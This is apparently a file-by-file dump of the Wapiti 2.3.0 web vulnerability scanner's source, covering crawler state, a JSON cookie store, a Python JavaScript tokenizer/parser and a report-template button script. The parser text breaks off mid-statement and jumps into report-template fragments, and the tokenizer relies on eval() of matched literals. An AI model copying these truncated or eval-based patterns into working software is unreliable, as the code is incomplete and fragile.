                    self.browsed.append(http_res)
                elif self.method == "POST":
                    self.forms.append(http_res)

    def __char_data(self, data):
        if self.tag == self.ROOT_URL:
            self.rootURL = data.strip(" ")
        elif self.tag == self.REFERER:
            self.referer = data.strip(" ")

    def setRootURL(self, rootURL):
        self.rootURL = rootURL

    def getRootURL(self):
        return self.rootURL

    def setToBrose(self, toBrowse):
        self.toBrowse = toBrowse

    def getToBrose(self):
        return self.toBrowse

    def setBrowsed(self, browsed):
        self.browsed = browsed

    def getBrowsed(self):
        return self.browsed

    def setForms(self, forms):
        self.forms = forms

    def getForms(self):
        return self.forms

    def setUploads(self, uploads):
        self.uploads = uploads

    def getUploads(self):
        return self.uploads

wapiti-2.3.0+dfsg/wapitiCore/net/jsoncookie.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# This file is part of the Wapiti project (http://wapiti.sourceforge.net)
# Copyright (C) 2012-2013 Nicolas Surribas
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
import json
import cookielib
import requests


class jsoncookie(object):

    cookiedict = None
    fd = None

    # return a dictionary on success, None on failure
    def open(self, filename):
        if not filename:
            return None
        try:
            self.fd = open(filename, "r+")
            self.cookiedict = json.load(self.fd)
        except IOError:
            self.fd = open(filename, "w+")
            self.cookiedict = {}
        return self.cookiedict

    def addcookies(self, cookies):
        if not isinstance(cookies, requests.cookies.RequestsCookieJar):
            return False
        for domain, pathdict in cookies._cookies.items():
            dotdomain = domain if domain[0] == '.' else '.' + domain
            if dotdomain not in self.cookiedict.keys():
                self.cookiedict[dotdomain] = {}
            for path, keydict in pathdict.items():
                if path not in self.cookiedict[dotdomain].keys():
                    self.cookiedict[dotdomain][path] = {}
                for key, cookieobj in keydict.items():
                    if isinstance(cookieobj, cookielib.Cookie):
                        print cookieobj
                        cookie_attrs = {}
                        cookie_attrs["value"] = cookieobj.value
                        cookie_attrs["expires"] = cookieobj.expires
                        cookie_attrs["secure"] = cookieobj.secure
                        cookie_attrs["port"] = cookieobj.port
                        cookie_attrs["version"] = cookieobj.version
                        self.cookiedict[dotdomain][path][key] = cookie_attrs

    def cookiejar(self, domain):
        if not domain:
            return None

        dotdomain = domain if domain[0] == '.' else '.' + domain
        exploded = dotdomain.split(".")
        parent_domains = [".%s" % (".".join(exploded[x:])) for x in range(1, len(exploded) - 1)]
        matching_domains = [d for d in parent_domains if d in self.cookiedict]
        if not matching_domains:
            return None

        cj = cookielib.CookieJar()
        for d in matching_domains:
            for path in self.cookiedict[d]:
                for cookie_name, cookie_attrs in self.cookiedict[d][path].items():
                    ck = cookielib.Cookie(version=cookie_attrs["version"],
                                          name=cookie_name,
                                          value=cookie_attrs["value"],
                                          port=None,
                                          port_specified=False,
                                          domain=d,
                                          domain_specified=True,
                                          domain_initial_dot=False,
                                          path=path,
                                          path_specified=True,
                                          secure=cookie_attrs["secure"],
                                          expires=cookie_attrs["expires"],
                                          discard=True,
                                          comment=None,
                                          comment_url=None,
                                          rest={'HttpOnly': None},
                                          rfc2109=False)

                    if cookie_attrs["port"]:
                        ck.port = cookie_attrs["port"]
                        ck.port_specified = True

                    cj.set_cookie(ck)
        return cj

    def delete(self, domain, path=None, key=None):
        if not domain:
            return False
        if domain not in self.cookiedict.keys():
            return False

        if not path:
            # delete whole domain data
            self.cookiedict.pop(domain)
            return True

        # path asked for deletion... but does not exist
        if path not in self.cookiedict[domain].keys():
            return False

        if not key:
            # remove every data on the specified domain for the matching path
            self.cookiedict[domain].pop(path)
            return True

        if key in self.cookiedict[domain][path].keys():
            self.cookiedict[domain][path].pop(key)
            return True
        return False

    def dump(self):
        if not self.fd:
            return False
        self.fd.seek(0)
        self.fd.truncate()
        json.dump(self.cookiedict, self.fd, indent=2)
        return True

    def close(self):
        self.fd.close()

wapiti-2.3.0+dfsg/wapitiCore/net/jsparser/
wapiti-2.3.0+dfsg/wapitiCore/net/jsparser/__init__.py
wapiti-2.3.0+dfsg/wapitiCore/net/jsparser/jsparser.py
#!/usr/bin/python
#
# This file is a modification of jsparser.py from pynarcissus ( https://code.google.com/p/pynarcissus/ )
#
# ***** BEGIN LICENSE BLOCK *****
# Version: MPL 1.1/GPL 2.0/LGPL 2.1
#
# The contents of this file are subject to the Mozilla Public License Version
# 1.1 (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
# http://www.mozilla.org/MPL/
#
# Software distributed under the License is distributed on an "AS IS" basis,
# WITHOUT WARRANTY OF ANY KIND, either express or implied. See the License
# for the specific language governing rights and limitations under the
# License.
#
# The Original Code is the Narcissus JavaScript engine, written in Javascript.
#
# The Initial Developer of the Original Code is
# Brendan Eich .
# Portions created by the Initial Developer are Copyright (C) 2004
# the Initial Developer. All Rights Reserved.
#
# The Python version of the code was created by JT Olds ,
# and is a direct translation from the Javascript version.
#
# Alternatively, the contents of this file may be used under the terms of
# either the GNU General Public License Version 2 or later (the "GPL"), or
# the GNU Lesser General Public License Version 2.1 or later (the "LGPL"),
# in which case the provisions of the GPL or the LGPL are applicable instead
# of those above. If you wish to allow use of your version of this file only
# under the terms of either the GPL or the LGPL, and not to allow others to
# use your version of this file under the terms of the MPL, indicate your
# decision by deleting the provisions above and replace them with the notice
# and other provisions required by the GPL or the LGPL. If you do not delete
# the provisions above, a recipient may use your version of this file under
# the terms of any one of the MPL, the GPL or the LGPL.
#
# ***** END LICENSE BLOCK ***** */

"""
 PyNarcissus

 A lexical scanner and parser. JS implemented in JS, ported to Python.
"""

import re
import sys


class Object:
    pass


class Error_(Exception):
    pass


class ParseError(Error_):
    pass

GLOBALS = {}

tokens = {0: 'END', 1: '\n', 2: ';', 3: ',', 4: '=', 5: '?', 6: ':', 7: 'CONDITIONAL',
          8: '||', 9: '&&', 10: '|', 11: '^', 12: '&', 13: '==', 14: '!=', 15: '===',
          16: '!==', 17: '<', 18: '<=', 19: '>=', 20: '>', 21: '<<', 22: '>>', 23: '>>>',
          24: '+', 25: '-', 26: '*', 27: '/', 28: '%', 29: '!', 30: '~', 31: 'UNARY_PLUS',
          32: 'UNARY_MINUS', 33: '++', 34: '--', 35: '.', 36: '[', 37: ']', 38: '{', 39: '}',
          40: '(', 41: ')', 42: 'SCRIPT', 43: 'BLOCK', 44: 'LABEL', 45: 'FOR_IN', 46: 'CALL',
          47: 'NEW_WITH_ARGS', 48: 'INDEX', 49: 'ARRAY_INIT', 50: 'OBJECT_INIT',
          51: 'PROPERTY_INIT', 52: 'GETTER', 53: 'SETTER', 54: 'GROUP', 55: 'LIST',
          56: 'IDENTIFIER', 57: 'NUMBER', 58: 'STRING', 59: 'REGEXP', 60: 'break', 61: 'case',
          62: 'catch', 63: 'const', 64: 'continue', 65: 'debugger', 66: 'default', 67: 'delete',
          68: 'do', 69: 'else', 70: 'enum', 71: 'false', 72: 'finally', 73: 'for',
          74: 'function', 75: 'if', 76: 'in', 77: 'instanceof', 78: 'new', 79: 'null',
          80: 'return', 81: 'switch', 82: 'this', 83: 'throw', 84: 'true', 85: 'try',
          86: 'typeof', 87: 'var', 88: 'void', 89: 'while', 90: 'with'}

opTypeNames = [('\n', "NEWLINE"), (';', "SEMICOLON"), (',', "COMMA"), ('?', "HOOK"),
               (':', "COLON"), ('||', "OR"), ('&&', "AND"), ('|', "BITWISE_OR"),
               ('^', "BITWISE_XOR"), ('&', "BITWISE_AND"), ('===', "STRICT_EQ"), ('==', "EQ"),
               ('=', "ASSIGN"), ('!==', "STRICT_NE"), ('!=', "NE"), ('<<', "LSH"), ('<=', "LE"),
               ('<', "LT"), ('>>>', "URSH"), ('>>', "RSH"), ('>=', "GE"), ('>', "GT"),
               ('++', "INCREMENT"), ('--', "DECREMENT"), ('+', "PLUS"), ('-', "MINUS"),
               ('*', "MUL"), ('/', "DIV"), ('%', "MOD"), ('!', "NOT"), ('~', "BITWISE_NOT"),
               ('.', "DOT"), ('[', "LEFT_BRACKET"), (']', "RIGHT_BRACKET"),
               ('{', "LEFT_CURLY"), ('}', "RIGHT_CURLY"), ('(', "LEFT_PAREN"),
               (')', "RIGHT_PAREN")]

opTypeNames = {
    '>=': 'GE', '>>': 'RSH', '<<': 'LSH', '<=': 'LE', '!=': 'NE', '!': 'NOT', '%': 'MOD',
    '&': 'BITWISE_AND', ')': 'RIGHT_PAREN', '(': 'LEFT_PAREN', '+': 'PLUS', '*': 'MUL',
    '-': 'MINUS', ',': 'COMMA', '/': 'DIV', '.': 'DOT', '>>>': 'URSH', ';': 'SEMICOLON',
    ':': 'COLON', '=': 'ASSIGN', '||': 'OR', '?': 'HOOK', '>': 'GT', '\n': 'NEWLINE',
    '==': 'EQ', '&&': 'AND', '[': 'LEFT_BRACKET', ']': 'RIGHT_BRACKET', '^': 'BITWISE_XOR',
    '===': 'STRICT_EQ', '!==': 'STRICT_NE', '++': 'INCREMENT', '<': 'LT', '--': 'DECREMENT',
    '{': 'LEFT_CURLY', '}': 'RIGHT_CURLY', '|': 'BITWISE_OR', '~': 'BITWISE_NOT'
}

GLOBALS = {'VOID': 88, 'RIGHT_BRACKET': 37, 'UNARY_MINUS': 32, 'RIGHT_PAREN': 41,
           'STRICT_EQ': 15, 'TRUE': 84, 'MINUS': 25, 'NEWLINE': 1, 'PLUS': 24, 'GT': 20,
           'DEBUGGER': 65, 'ENUM': 70, 'GE': 19, 'VAR': 87, 'ARRAY_INIT': 49,
           'BITWISE_XOR': 11, 'RETURN': 80, 'BITWISE_NOT': 30, 'THIS': 82, 'TYPEOF': 86,
           'OR': 8, 'DELETE': 67, 'INDEX': 48, 'GROUP': 54, 'NEW_WITH_ARGS': 47, 'LABEL': 44,
           'BITWISE_AND': 12, 'NEW': 78, 'BLOCK': 43, 'SETTER': 53, 'WITH': 90, 'LSH': 21,
           'COLON': 6, 'UNARY_PLUS': 31, 'FUNCTION': 74, 'END': 0, 'FOR': 73, 'ELSE': 69,
           'TRY': 85, 'GETTER': 52, 'REGEXP': 59, 'EQ': 13, 'DECREMENT': 34, 'AND': 9,
           'CONTINUE': 64, 'NOT': 29, 'LEFT_CURLY': 38, 'RIGHT_CURLY': 39, 'DEFAULT': 66,
           'STRICT_NE': 16, 'WHILE': 89, 'MUL': 26, 'DOT': 35, 'CASE': 61, 'SEMICOLON': 2,
           'SCRIPT': 42, 'CONDITIONAL': 7, 'LEFT_PAREN': 40, 'NE': 14, 'SWITCH': 81,
           'INCREMENT': 33, 'CATCH': 62, 'IDENTIFIER': 56, 'INSTANCEOF': 77, 'FALSE': 71,
           'LIST': 55, 'BREAK': 60, 'BITWISE_OR': 10, 'LEFT_BRACKET': 36, 'DO': 68,
           'CONST': 63, 'NUMBER': 57, 'HOOK': 5, 'DIV': 27, 'NULL': 79, 'LE': 18, 'URSH': 23,
           'LT': 17, 'COMMA': 3, 'ASSIGN': 4, 'STRING': 58, 'FINALLY': 72, 'FOR_IN': 45,
           'IN': 76, 'IF': 75, 'RSH': 22, 'PROPERTY_INIT': 51, 'CALL': 46, 'OBJECT_INIT': 50,
           'MOD': 28, 'THROW': 83}

tokens = {0: 'END', 1: '\n', 2: ';', 3: ',', 4: '=', 5: '?', 6: ':', 7: 'CONDITIONAL',
          8: '||', 9: '&&', 10: '|', 11: '^', 12: '&', 13: '==', 14: '!=', 15: '===',
          16: '!==', 17: '<', 18: '<=', 19: '>=', 20: '>', 21: '<<', 22: '>>', 23: '>>>',
          24: '+', 25: '-', 26: '*', 27: '/', 28: '%', 29: '!', 30: '~', 31: 'UNARY_PLUS',
          32: 'UNARY_MINUS', 33: '++', 34: '--', 35: '.', 36: '[', 37: ']', 38: '{', 39: '}',
          40: '(', 41: ')', 42: 'SCRIPT', 43: 'BLOCK', 44: 'LABEL', 45: 'FOR_IN', 46: 'CALL',
          47: 'NEW_WITH_ARGS', 48: 'INDEX', 49: 'ARRAY_INIT', 50: 'OBJECT_INIT',
          51: 'PROPERTY_INIT', 52: 'GETTER', 53: 'SETTER', 54: 'GROUP', 55: 'LIST',
          56: 'IDENTIFIER', 57: 'NUMBER', 58: 'STRING', 59: 'REGEXP', 60: 'break', 61: 'case',
          62: 'catch', 63: 'const', 64: 'continue', 65: 'debugger', 66: 'default', 67: 'delete',
          68: 'do', 69: 'else', 70: 'enum', 71: 'false', 72: 'finally', 73: 'for',
          74: 'function', 75: 'if', 76: 'in', 77: 'instanceof', 78: 'new', 79: 'null',
          80: 'return', 81: 'switch', 82: 'this', 83: 'throw', 84: 'true', 85: 'try',
          86: 'typeof', 87: 'var', 88: 'void', 89: 'while', 90: 'with',
          'UNARY_PLUS': 31, 'ARRAY_INIT': 49, 'instanceof': 77, '--': 34, 'try': 85,
          'this': 82, 'UNARY_MINUS': 32, '|': 10, 'INDEX': 48, 'GROUP': 54,
          'NEW_WITH_ARGS': 47, 'LABEL': 44, 'BLOCK': 43, 'SETTER': 53, 'const': 63, 'for': 73,
          '+': 24, '/': 27, 'case': 61, 'continue': 64, 'new': 78, ';': 2, '?': 5, 'END': 0,
          'enum': 70, 'GETTER': 52, '&&': 9, 'REGEXP': 59, '[': 36, 'throw': 83, '!==': 16,
          '++': 33, 'SCRIPT': 42, '(': 40, '{': 38, 'delete': 67, '*': 26, '>=': 19, '>>': 22,
          '\n': 1, ',': 3, '!=': 14, 'debugger': 65, '&': 12, 'CONDITIONAL': 7, 'finally': 72,
          '.': 35, 'var': 87, ':': 6, '>': 20, 'function': 74, 'with': 90, 'else': 69,
          '>>>': 23, 'catch': 62, 'true': 84, '^': 11, '===': 15, '||': 8, 'IDENTIFIER': 56,
          'default': 66, 'LIST': 55, '<': 17, 'while': 89, 'typeof': 86, '~': 30, 'false': 71,
          'do': 68, '<<': 21, '<=': 18, 'NUMBER': 57, 'in': 76, 'return': 80, 'null': 79,
          'if': 75, '!': 29, 'FOR_IN': 45, '%': 28, ')': 41, '-': 25, '==': 13, '=': 4,
          'void': 88, 'STRING': 58, ']': 37, 'break': 60, 'PROPERTY_INIT': 51, 'switch': 81,
          'CALL': 46, 'OBJECT_INIT': 50, '}': 39}

keywords = {'false': 71, 'debugger': 65, 'in': 76, 'null': 79, 'if': 75, 'const': 63,
            'for': 73, 'with': 90, 'while': 89, 'finally': 72, 'var': 87, 'new': 78,
            'function': 74, 'do': 68, 'return': 80, 'void': 88, 'enum': 70, 'else': 69,
            'break': 60, 'catch': 62, 'instanceof': 77, 'true': 84, 'throw': 83, 'case': 61,
            'default': 66, 'try': 85, 'this': 82, 'switch': 81, 'continue': 64, 'typeof': 86,
            'delete': 67}

assignOps = {0: '|', 1: '^', 2: '&', 3: '<<', 4: '>>', 5: '>>>', '>>': 22, 7: '-', 8: '*',
             9: '/', '<<': 21, '%': 28, 6: '+', '&': 12, '+': 24, '*': 26, '-': 25, '/': 27,
             '>>>': 23, 10: '%', '^': 11, '|': 10}

opRegExp = re.compile(r"^;|^,|^\?|^:|^\|\||^\&\&|^\||^\^|^\&|^===|^==|^=|^!==|^!=|^<<|^<=|^<|^>>>|^>>|^>=|^>|^\+\+|^\-\-|^\+|^\-|^\*|^\/|^%|^!|^~|^\.|^\[|^\]|^\{|^\}|^\(|^\)")

# A regexp to match floating point literals (but not integer literals).
fpRegExp = re.compile(r'^\d+\.\d*(?:[eE][-+]?\d+)?|^\d+(?:\.\d*)?[eE][-+]?\d+|^\.\d+(?:[eE][-+]?\d+)?')

# A regexp to match regexp literals.
reRegExp = re.compile(r'^\/((?:\\.|\[(?:\\.|[^\]])*\]|[^\/])+)\/([gimy]*)')


class SyntaxError_(ParseError):
    def __init__(self, message, filename, lineno):
        ParseError.__init__(self, "Syntax error: %s\n%s:%s" % (message, filename, lineno))


class Tokenizer(object):
    def __init__(self, s, f, l):
        self.cursor = 0
        self.source = str(s)
        # Ring buffer of the last four tokens, indexed modulo 4 (hence the "& 3" below)
        self.tokens = {}
        self.tokenIndex = 0
        self.lookahead = 0
        self.scanNewlines = False
        self.scanOperand = True
        self.filename = f
        self.lineno = l

    input_ = property(lambda self: self.source[self.cursor:])
    done = property(lambda self: self.peek() == GLOBALS['END'])
    token = property(lambda self: self.tokens.get(self.tokenIndex))

    def match(self, tt):
        return self.get() == tt or self.unget()

    def mustMatch(self, tt):
        if not self.match(tt):
            raise self.newSyntaxError("Missing " + tokens.get(tt).lower())
        return self.token

    def peek(self):
        if self.lookahead:
            next = self.tokens.get((self.tokenIndex + self.lookahead) & 3)
            if self.scanNewlines and (getattr(next, "lineno", None) != getattr(self, "lineno", None)):
                tt = GLOBALS['NEWLINE']
            else:
                tt = getattr(next, "type_", None)
        else:
            tt = self.get()
            self.unget()
        return tt

    def peekOnSameLine(self):
        self.scanNewlines = True
        tt = self.peek()
        self.scanNewlines = False
        return tt

    def get(self):
        # Replay tokens that were pushed back with unget()
        while self.lookahead:
            self.lookahead -= 1
            self.tokenIndex = (self.tokenIndex + 1) & 3
            token = self.tokens.get(self.tokenIndex)
            if getattr(token, "type_", None) != GLOBALS['NEWLINE'] or self.scanNewlines:
                return getattr(token, "type_", None)

        # Skip whitespace and comments, keeping the line counter up to date
        while True:
            input__ = self.input_
            if self.scanNewlines:
                match = re.match(r'^[ \t]+', input__)
            else:
                match = re.match(r'^\s+', input__)
            if match:
                spaces = match.group(0)
                self.cursor += len(spaces)
                newlines = re.findall(r'\n', spaces)
                if newlines:
                    self.lineno += len(newlines)
                input__ = self.input_

            match = re.match(r'^\/(?:\*(?:.|\n)*?\*\/|\/.*)', input__)
            if not match:
                break
            comment = match.group(0)
            self.cursor += len(comment)
            newlines = re.findall(r'\n', comment)
            if newlines:
                self.lineno += len(newlines)

        self.tokenIndex = (self.tokenIndex + 1) & 3
        token = self.tokens.get(self.tokenIndex)
        if not token:
            token = Object()
            self.tokens[self.tokenIndex] = token

        if not input__:
            token.type_ = GLOBALS['END']
            return GLOBALS['END']

        def matchInput():
            match = fpRegExp.match(input__)
            if match:
                token.type_ = GLOBALS['NUMBER']
                token.value = float(match.group(0))
                return match.group(0)

            match = re.match(r'^0[xX][\da-fA-F]+|^0[0-7]*|^\d+', input__)
            if match:
                token.type_ = GLOBALS['NUMBER']
                # eval() is applied only to the text matched by the integer regexp above
                token.value = eval(match.group(0))
                return match.group(0)

            match = re.match(r'^[$_\w]+', input__)       # FIXME no ES3 unicode
            if match:
                id_ = match.group(0)
                token.type_ = keywords.get(id_, GLOBALS['IDENTIFIER'])
                token.value = id_
                return match.group(0)

            match = re.match(r'^"(?:\\.|[^"])*"|^\'(?:\\.|[^\'])*\'', input__)
            if match:
                token.type_ = GLOBALS['STRING']
                # eval() is applied only to the quoted literal matched by the regexp above
                token.value = eval(match.group(0))
                return match.group(0)

            if self.scanOperand:
                match = reRegExp.match(input__)
                if match:
                    token.type_ = GLOBALS['REGEXP']
                    token.value = {"regexp": match.group(1), "modifiers": match.group(2)}
                    return match.group(0)

            match = opRegExp.match(input__)
            if match:
                op = match.group(0)
                # Slice instead of indexing, so an operator at the very end of
                # the input does not raise IndexError
                if op in assignOps and input__[len(op):len(op) + 1] == '=':
                    token.type_ = GLOBALS['ASSIGN']
                    token.assignOp = GLOBALS[opTypeNames[op]]
                    token.value = op
                    return match.group(0) + "="
                token.type_ = GLOBALS[opTypeNames[op]]
                if self.scanOperand and (token.type_ in (GLOBALS['PLUS'], GLOBALS['MINUS'])):
                    token.type_ += GLOBALS['UNARY_PLUS'] - GLOBALS['PLUS']
                token.assignOp = None
                token.value = op
                return match.group(0)

            if self.scanNewlines:
                match = re.match(r'^\n', input__)
                if match:
                    token.type_ = GLOBALS['NEWLINE']
                    return match.group(0)

            raise self.newSyntaxError("Illegal token")

        token.start = self.cursor
        self.cursor += len(matchInput())
        token.end = self.cursor
        token.lineno = self.lineno
        return getattr(token, "type_", None)

    def unget(self):
        self.lookahead += 1
        if self.lookahead == 4:
            # A string cannot be raised as an exception; raise the module's ParseError
            raise ParseError("PANIC: too much lookahead!")
        self.tokenIndex = (self.tokenIndex - 1) & 3

    def newSyntaxError(self, m):
        return SyntaxError_(m, self.filename, self.lineno)


class CompilerContext(object):
    def __init__(self, inFunction):
        self.inFunction = inFunction
        self.stmtStack = []
        self.funDecls = []
        self.varDecls = []
        self.bracketLevel = 0
        self.curlyLevel = 0
        self.parenLevel = 0
        self.hookLevel = 0
        self.ecmaStrictMode = False
        self.inForLoopInit = False


def Script(t, x):
    n = Statements(t, x)
    n.type_ = GLOBALS['SCRIPT']
    n.funDecls = x.funDecls
    n.varDecls = x.varDecls
    return n


class Node(list):
    def __init__(self, t, type_=None, args=[]):
        list.__init__(self)

        token = t.token
        if token:
            if type_:
                self.type_ = type_
            else:
                self.type_ = getattr(token, "type_", None)
            self.value = token.value
            self.lineno = token.lineno
            self.start = token.start
            self.end = token.end
        else:
            self.type_ = type_
            self.lineno = t.lineno
        self.tokenizer = t

        for arg in args:
            self.append(arg)

    type = property(lambda self: tokenstr(self.type_))

    # Always use push to add operands to an expression, to update start and end.
    def append(self, kid, numbers=[]):
        if kid:
            if hasattr(self, "start") and kid.start < self.start:
                self.start = kid.start
            if hasattr(self, "end") and self.end < kid.end:
                self.end = kid.end
        return list.append(self, kid)

    indentLevel = 0

    def __str__(self):
        a = list((str(i), v) for i, v in enumerate(self))
        for attr in dir(self):
            if attr[0] == "_":
                continue
            elif attr == "tokenizer":
                a.append((attr, "[object Object]"))
            elif attr in ("append", "count", "extend", "getSource", "index",
                          "insert", "pop", "remove", "reverse", "sort", "type_",
                          "target", "filename", "indentLevel", "type"):
                continue
            else:
                a.append((attr, getattr(self, attr)))
        if len(self):
            a.append(("length", len(self)))
        a.sort(lambda a, b: cmp(a[0], b[0]))
        INDENTATION = " "
        Node.indentLevel += 1
        n = Node.indentLevel
        s = "{\n%stype: %s" % ((INDENTATION * n), tokenstr(self.type_))
        for i, value in a:
            s += ",\n%s%s: " % ((INDENTATION * n), i)
            if i == "value" and self.type_ == GLOBALS['REGEXP']:
                s += "/%s/%s" % (value["regexp"], value["modifiers"])
            elif value is None:
                s += "null"
            elif value is False:
                s += "false"
            elif value is True:
                s += "true"
            elif type(value) == list:
                s += ','.join((str(x) for x in value))
            else:
                s += str(value)
        Node.indentLevel -= 1
        n = Node.indentLevel
        s += "\n%s}" % (INDENTATION * n)
        return s
    __repr__ = __str__

    def getSource(self):
        if getattr(self, "start", None) is not None:
            if getattr(self, "end", None) is not None:
                return self.tokenizer.source[self.start:self.end]
            return self.tokenizer.source[self.start:]
        if getattr(self, "end", None) is not None:
            return self.tokenizer.source[:self.end]
        return self.tokenizer.source[:]

    filename = property(lambda self: self.tokenizer.filename)

    def __nonzero__(self):
        return True


# Statement stack and nested statement handler.
def nest(t, x, node, func, end=None):
    x.stmtStack.append(node)
    n = func(t, x)
    x.stmtStack.pop()
    if end:
        t.mustMatch(end)
    return n


def tokenstr(tt):
    t = tokens[tt]
    if re.match(r'^\W', t):
        return opTypeNames[t]
    return t.upper()


def Statements(t, x):
    n = Node(t, GLOBALS['BLOCK'])
    x.stmtStack.append(n)
    while not t.done and t.peek() != GLOBALS['RIGHT_CURLY']:
        n.append(Statement(t, x))
    x.stmtStack.pop()
    return n


def Block(t, x):
    t.mustMatch(GLOBALS['LEFT_CURLY'])
    n = Statements(t, x)
    t.mustMatch(GLOBALS['RIGHT_CURLY'])
    return n

DECLARED_FORM = 0
EXPRESSED_FORM = 1
STATEMENT_FORM = 2


def Statement(t, x):
    tt = t.get()

    # Cases for statements ending in a right curly return early, avoiding the
    # common semicolon insertion magic after this switch.
    if tt == GLOBALS['FUNCTION']:
        if len(x.stmtStack) > 1:
            type_ = STATEMENT_FORM
        else:
            type_ = DECLARED_FORM
        return FunctionDefinition(t, x, True, type_)

    elif tt == GLOBALS['LEFT_CURLY']:
        n = Statements(t, x)
        t.mustMatch(GLOBALS['RIGHT_CURLY'])
        return n

    elif tt == GLOBALS['IF']:
        n = Node(t)
        n.condition = ParenExpression(t, x)
        x.stmtStack.append(n)
        n.thenPart = Statement(t, x)
        if t.match(GLOBALS['ELSE']):
            n.elsePart = Statement(t, x)
        else:
            n.elsePart = None
        x.stmtStack.pop()
        return n

    elif tt == GLOBALS['SWITCH']:
        n = Node(t)
        t.mustMatch(GLOBALS['LEFT_PAREN'])
        n.discriminant = Expression(t, x)
        t.mustMatch(GLOBALS['RIGHT_PAREN'])
        n.cases = []
        n.defaultIndex = -1
        x.stmtStack.append(n)
        t.mustMatch(GLOBALS['LEFT_CURLY'])
        while True:
            tt = t.get()
            if tt == GLOBALS['RIGHT_CURLY']:
                break

            if tt in (GLOBALS['DEFAULT'], GLOBALS['CASE']):
                if tt == GLOBALS['DEFAULT'] and n.defaultIndex >= 0:
                    raise t.newSyntaxError("More than one switch default")
                n2 = Node(t)
                if tt == GLOBALS['DEFAULT']:
                    n.defaultIndex = len(n.cases)
                else:
                    n2.caseLabel = Expression(t, x, GLOBALS['COLON'])
            else:
                raise t.newSyntaxError("Invalid switch case")
            t.mustMatch(GLOBALS['COLON'])
            n2.statements = Node(t, GLOBALS['BLOCK'])
            while True:
                tt = t.peek()
                if(tt == GLOBALS['CASE'] or tt == GLOBALS['DEFAULT'] or tt == GLOBALS['RIGHT_CURLY']):
                    break
                n2.statements.append(Statement(t, x))
            n.cases.append(n2)
        x.stmtStack.pop()
        return n

    elif tt == GLOBALS['FOR']:
        n = Node(t)
        n2 = None
        n.isLoop = True
        t.mustMatch(GLOBALS['LEFT_PAREN'])
        tt = t.peek()
        if tt != GLOBALS['SEMICOLON']:
            x.inForLoopInit = True
            if tt == GLOBALS['VAR'] or tt == GLOBALS['CONST']:
                t.get()
                n2 = Variables(t, x)
            else:
                n2 = Expression(t, x)
            x.inForLoopInit = False

        if n2 and t.match(GLOBALS['IN']):
            n.type_ = GLOBALS['FOR_IN']
            if n2.type_ == GLOBALS['VAR']:
                if len(n2) != 1:
                    # Use the module's SyntaxError_ (a ParseError), not the
                    # Python builtin, so callers catching ParseError see it
                    raise SyntaxError_("Invalid for..in left-hand side", t.filename, n2.lineno)

                # NB: n2[0].type_ == IDENTIFIER and n2[0].value == n2[0].name
                n.iterator = n2[0]
                n.varDecl = n2
            else:
                n.iterator = n2
                n.varDecl = None
            n.object = Expression(t, x)
        else:
            if n2:
                n.setup = n2
            else:
                n.setup = None
            t.mustMatch(GLOBALS['SEMICOLON'])
            if t.peek() == GLOBALS['SEMICOLON']:
                n.condition = None
            else:
                n.condition = Expression(t, x)
            t.mustMatch(GLOBALS['SEMICOLON'])
            if t.peek() == GLOBALS['RIGHT_PAREN']:
                n.update = None
            else:
                n.update = Expression(t, x)
        t.mustMatch(GLOBALS['RIGHT_PAREN'])
        n.body = nest(t, x, n, Statement)
        return n

    elif tt == GLOBALS['WHILE']:
        n = Node(t)
        n.isLoop = True
        n.condition = ParenExpression(t, x)
        n.body = nest(t, x, n, Statement)
        return n

    elif tt == GLOBALS['DO']:
        n = Node(t)
        n.isLoop = True
        n.body = nest(t, x, n, Statement, GLOBALS['WHILE'])
        n.condition = ParenExpression(t, x)
        if not x.ecmaStrictMode: #

Summary

Category Number of vulnerabilities found

Wapiti © Nicolas SURRIBAS 2006-2013
wapiti-2.3.0+dfsg/wapitiCore/report_template/js/
wapiti-2.3.0+dfsg/wapitiCore/report_template/js/kube.buttons.js

/*
    kube.buttons.js v1.0.1
    Copyright 2013 Imperavi, Inc.
*/
!function ($) {
    "use strict";

    // Plugin
    $.fn.buttons = function(option) {
        return this.each(function() {
            var $obj = $(this);
            var data = $obj.data('buttons');
            if (!data) {
                $obj.data('buttons', (data = new Buttons(this, option)));
            }
        });
    };

    // Initialization
    var Buttons = function(element, options) {
        // Element
        this.$el = $(element);

        // Options
        this.opts = $.extend({
            target: false,
            type: false
        }, options, this.$el.data());

        // Init
        this.init();
    };

    // Functionality
    Buttons.prototype = {
        // Initialization
        init: function() {
            if (this.opts.type === 'toggle') this.buttons = this.$el;
            else this.buttons = this.$el.find('.btn');

            if (this.opts.type === 'segmented') this.value = $(this.opts.target).val().split(',');
            else this.value = $(this.opts.target).val();

            this.buttons.each($.proxy(function(i,s) {
                var $s = $(s);

                if (this.opts.type === 'segmented' && $.inArray($s.val(), this.value) !== -1) {
                    this.active($s);
                } else {
                    if (this.opts.type === 'toggle' && this.value === 1) this.active($s);
                    else if (this.value === $s.val()) this.active($s);
                }

                $s.click($.proxy(function(e) {
                    e.preventDefault();

                    if (this.opts.type === 'segmented') {
                        this.value = $(this.opts.target).val().split(',');
                        if (!$s.hasClass('btn-active')) {
                            this.active($s);
                            this.value.push($(s).val());
                        } else {
                            this.inactive($s);
                            this.value.splice(this.value.indexOf($s.val()), 1);
                        }
                        $(this.opts.target).val(this.value.join(',').replace(/^,/, ''));
                    } else if (this.opts.type === 'toggle') {
                        if ($s.hasClass('btn-active')) {
                            this.inactive($s);
                            $(this.opts.target).val(0);
                        } else {
                            this.active($s);
                            $(this.opts.target).val(1);
                        }
                    } else {
                        this.inactive(this.buttons);
                        this.active($s);
                        $(this.opts.target).val($s.val());
                    }
                }, this));
            }, this));
        },
        active: function($el) {
            $el.addClass('btn-active');
        },
        inactive: function($el) {
            $el.removeClass('btn-active');
        },
    };

    $(function() {
        $('[data-toggle="buttons"]').buttons();
    });
}(window.jQuery);

wapiti-2.3.0+dfsg/wapitiCore/report_template/js/kube.tabs.js

/*
    kube.tabs.js v1.0.1
    Copyright 2013 Imperavi, Inc.
*/
!function ($) {
    "use strict";

    // Plugin
